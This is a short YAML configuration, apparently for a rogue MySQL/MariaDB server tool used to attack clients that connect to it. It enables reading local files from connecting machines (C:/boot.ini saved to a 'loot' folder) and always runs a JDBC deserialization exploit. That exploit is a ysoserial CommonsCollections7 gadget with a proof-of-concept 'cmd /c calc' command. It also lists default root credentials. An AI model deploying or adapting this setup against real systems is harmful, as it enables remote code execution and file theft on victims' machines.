host: 0.0.0.0
port: 3306
version_string: "10.4.13-MariaDB-log"

file_list: ["C:/boot.ini"]
save_path: ./loot
always_read: false

auth: false
users:
  - root: root
  - root: password

jdbc_exploit: true
always_exploit: true
ysoserial_command: ["java", "-jar", "ysoserial-master-SNAPSHOT.jar", "CommonsCollections7", 'cmd /c calc']
